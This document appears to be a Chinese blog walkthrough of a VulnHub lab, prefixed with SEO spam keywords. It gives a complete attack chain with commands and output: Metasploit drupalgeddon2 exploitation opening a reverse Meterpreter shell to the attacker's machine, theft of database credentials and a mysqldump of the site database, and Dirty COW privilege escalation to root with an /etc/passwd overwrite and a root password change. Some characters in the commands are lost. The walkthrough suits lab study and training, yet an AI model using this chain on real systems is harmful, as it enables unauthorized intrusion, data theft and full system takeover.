网站建设专业开发公司,优惠券直播网站怎么做的,wordpress dede,seo优化是指提权(1), 脱裤, dirty-cow脏牛提权
本实验以打靶为案例演示脱裤和dirty-cow脏牛提权的操作过程.
实验环境:
靶机: https://www.vulnhub.com/entry/lampiao-1,249/
本地: 192.168.112.201, kali 目标: 192.168.112.202
一, 信息搜集
扫描全端口: nmap -p- 192.168.112.202…提权(1), 脱裤, dirty-cow脏牛提权
本实验以打靶为案例演示脱裤和dirty-cow脏牛提权的操作过程.
实验环境:
靶机: https://www.vulnhub.com/entry/lampiao-1,249/
本地: 192.168.112.201, kali 目标: 192.168.112.202
一, 信息搜集
扫描全端口: nmap -p- 192.168.112.202
22/tcp open ssh
80/tcp open http
1898/tcp open cymtec-port扫描端口服务的版本, 操作系统信息等: nmap -sV -A 192.168.112.202
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 46b199607d81693cae1fc7ffc366e310 (DSA)
| 2048 f3e888f22dd0b2540b9cad6133595593 (RSA)
| 256 ce632af7536e46e2ae81e3ffb716f452 (ECDSA)
|_ 256 c655ca073765e306c1d65b77dc23dfcc (ED25519)
80/tcp open http?
| fingerprint-strings:
| NULL:
AC Address: 00:0C:29:CB:D6:D6 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel这里发现没有出现80, 1898的指纹. 1898不是常用端口, 单独扫一下看看. nmap -sV -p1898 192.168.112.202 1898/tcp open http Apache httpd 2.4.7 ((Ubuntu))发现1898端口开着apache, 这可能是个网站, 尝试访问网站.
用浏览器访问80端口, 发现不是网站页面. 用浏览器访问1898端口, 发现网站页面, 观察一下页面. 在页面最下方发现 Powered by Drupal 说明可能是用 Drupal CMS开发的.
扫描网站指纹确认一下: whatweb 192.168.112.202:1898
Drupal 7 (http://drupal.org)], PHP[5.5.9-1ubuntu4.24]二, 漏洞利用
进入MSF, 搜索 Drupal 相关的模块. search drupal
Matching Modules
# Name Disclosure Date Rank Check Description- ---- --------------- ---- ----- -----------0 exploit/unix/webapp/drupal_coder_exec 2016-07-13 excellent Yes Drupal CODER Module Remote Command Execution1 exploit/unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Yes Drupal Drupalgeddon 2 Forms API Property Injection2 exploit/multi/http/drupal_drupageddon 2014-10-15 excellent No Drupal HTTP Parameter Key/Value SQL Injection3 auxiliary/gather/drupal_openid_xxe 2012-10-17 normal Yes Drupal OpenID External Entity Injection4 exploit/unix/webapp/drupal_restws_exec 2016-07-13 excellent Yes Drupal RESTWS Module Remote PHP Code Execution5 exploit/unix/webapp/drupal_restws_unserialize 2019-02-20 normal Yes Drupal RESTful Web Services unserialize() RCE6 auxiliary/scanner/http/drupal_views_user_enum 2010-07-02 normal Yes Drupal Views Module Users Enumeration7 exploit/unix/webapp/php_xmlrpc_eval 2005-06-29 excellent Yes PHP XML-RPC Arbitrary Code ExecutionInteract with a module by name or index. For example info 7, use 7 or use exploit/unix/webapp/php_xmlrpc_eval选drupal_drupalgeddon2做尝试: use 1
msf6 exploit(unix/webapp/drupal_drupalgeddon2) 查看选项参数: show options
Module options (exploit/unix/webapp/drupal_drupalgeddon2):Name Current Setting Required Description---- --------------- -------- -----------DUMP_OUTPUT false no Dump payload command outputPHP_FUNC passthru yes PHP function to executeProxies no A proxy chain of format type:host:port[,type:host:port][...]RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.htmlRPORT 80 yes The target port (TCP)SSL false no Negotiate SSL/TLS for outgoing connectionsTARGETURI / yes Path to Drupal installVHOST no HTTP server virtual host设置 rhosts 和 rport: set rhosts 192.168.112.202 set rport 1898
执行模块脚本: run
[*] Started reverse TCP handler on 192.168.112.201:4444
[*] Running automatic check (set AutoCheck false to disable)
[] The target is vulnerable.
[*] Sending stage (39927 bytes) to 192.168.112.202
[*] Meterpreter session 2 opened (192.168.112.201:4444 - 192.168.112.202:56586) at 2023-12-01 09:08:43 -0500meterpreter 这里进入了 meterpreter 环境, 漏洞利用成功.
三, 脱裤
反弹shell: shell
Process 26184 created.
Channel 0 created.用python开启虚拟bash: python -c ‘import pty;pty.spawn(“/bin/bash”)’
www-datalampiao:/var/www/html$ 一般CMS都有默认的配置文件路径, 可以从网上去搜索. 找到 drupal CMS 的配置文件 sites/default/settings.php: 打开文件, 找到数据库的配置信息:
database drupal,username drupaluser,password Virgulino,host localhost,port ,driver mysql,prefix ,那么这里看到了mysql的用户名, 密码, 数据库名.
检查mysqldump命令: whereis mysqldump
mysqldump: /usr/bin/mysqldump /usr/share/man/man1/mysqldump.1.gz脱裤: mysqldump -udrupaluser -pVirgulino drupal drupal.sql
退回 meterpreter 控制台: exit
下载 drupal.sql 文件到本地: download drupal.sql /root
四, Dirty-Cow 脏牛提权
linux系统尝试脏牛漏洞提权, Dirty-Cow
1. 查看当前用户权限
getuid
Server username: www-data反弹shell: shell
Process 27216 created.
Channel 1 created.用python开启虚拟bash: python -c ‘import pty;pty.spawn(“/bin/bash”)’
2. 检查目标的编译环境
python --version php -v gcc -v
Python 2.7.6PHP 5.5.9-1ubuntu4.24 (cli) (built: Mar 16 2018 12:32:06)
Copyright (c) 1997-2014 The PHP Group
Zend Engine v2.5.0, Copyright (c) 1998-2014 Zend Technologieswith Zend OPcache v7.0.3, Copyright (c) 1999-2014, by Zend Technologiesgcc version 4.8.4 (Ubuntu 4.8.4-2ubuntu1~14.04.4)2. kali搜索脏牛代码
dirty-cow不在msf的模块库中, 所以需要在网上或者kali中单独搜索. 网站搜索: exploit-db.com searchsploit dirty
-------------------------------------------------------------------------------------------------------------------------- ---------------------------------Exploit Title | Path
-------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel - The Huge Dirty Cow Overwriting The Huge Zero Page (1) | linux/dos/43199.c
Linux Kernel - The Huge Dirty Cow Overwriting The Huge Zero Page (2) | linux/dos/44305.c
Linux Kernel 2.6.22 3.9 (x86/x64) - Dirty COW /proc/self/mem Race Condition Privilege Escalation (SUID Method) | linux/local/40616.c
Linux Kernel 2.6.22 3.9 - Dirty COW /proc/self/mem Race Condition Privilege Escalation (/etc/passwd Method) | linux/local/40847.cpp
Linux Kernel 2.6.22 3.9 - Dirty COW PTRACE_POKEDATA Race Condition (Write Access Method) | linux/local/40838.c
Linux Kernel 2.6.22 3.9 - Dirty COW PTRACE_POKEDATA Race Condition Privilege Escalation (/etc/passwd Method) | linux/local/40839.c
Linux Kernel 2.6.22 3.9 - Dirty COW /proc/self/mem Race Condition (Write Access Method) | linux/local/40611.c
Linux Kernel 5.8 5.16.11 - Local Privilege Escalation (DirtyPipe) | linux/local/50808.c
Qualcomm Android - Kernel Use-After-Free via Incorrect set_page_dirty() in KGSL | android/dos/46941.txt
Quick and Dirty Blog (qdblog) 0.4 - categories.php Local File Inclusion | php/webapps/4603.txt
Quick and Dirty Blog (qdblog) 0.4 - SQL Injection / Local File Inclusion | php/webapps/3729.txt
snapd 2.37 (Ubuntu) - dirty_sock Local Privilege Escalation (1) | linux/local/46361.py
snapd 2.37 (Ubuntu) - dirty_sock Local Privilege Escalation (2) | linux/local/46362.py
-------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
通常使用 /etc/passwd 方法提权, 40839.c 和 40847.cpp, 这两个是c或c源码, 需要编译才能使用.
3. 尝试 40847.cpp 提权
查看源码的路径: searchsploit -p 40847 Exploit: Linux Kernel 2.6.22 3.9 - Dirty COW /proc/self/mem Race Condition Privilege Escalation (/etc/passwd Method)URL: https://www.exploit-db.com/exploits/40847Path: /usr/share/exploitdb/exploits/linux/local/40847.cppCodes: CVE-2016-5195Verified: True
File Type: C source, ASCII text查看源码注释: vi /usr/share/exploitdb/exploits/linux/local/40847.cpp
// EDB-Note: Compile: g -Wall -pedantic -O2 -stdc11 -pthread -o dcow 40847.cpp -lutil
// EDB-Note: Recommended way to run: ./dcow -s (Will automatically do echo 0 /proc/sys/vm/dirty_writeback_centisecs)从 meterpreter 上传代码到目标主机/tmp目录下: upload /usr/share/exploitdb/exploits/linux/local/40847.cpp /tmp
反弹shell: shell
进入虚拟bash: python -c ‘import pty;pty.spawn(“/bin/bash”)’
www-datalampiao:/var/www/html$ 进入/tmp目录编译源码: 这行代码编译出一个 dcow 可执行文件. g -Wall -pedantic -O2 -stdc11 -pthread -o dcow 40847.cpp -lutil
-Wall -pedantic -O2 -stdc11 -pthread -o dcow 40847.cpp -lutil 执行程序: ./dcow -s
Running ...
Password overridden to: dirtyCowFunReceived su prompt (Password: )rootlampiao:~# echo 0 /proc/sys/vm/dirty_writeback_centisecs
rootlampiao:~# cp /tmp/.ssh_bak /etc/passwd
rootlampiao:~# rm /tmp/.ssh_bak
rootlampiao:~# root提权成功.
查看权限: id
uid0(root) gid0(root) groups0(root)修改root密码: passwd
Enter new UNIX password: root
Retype new UNIX password: root
passwd: password updated successfully
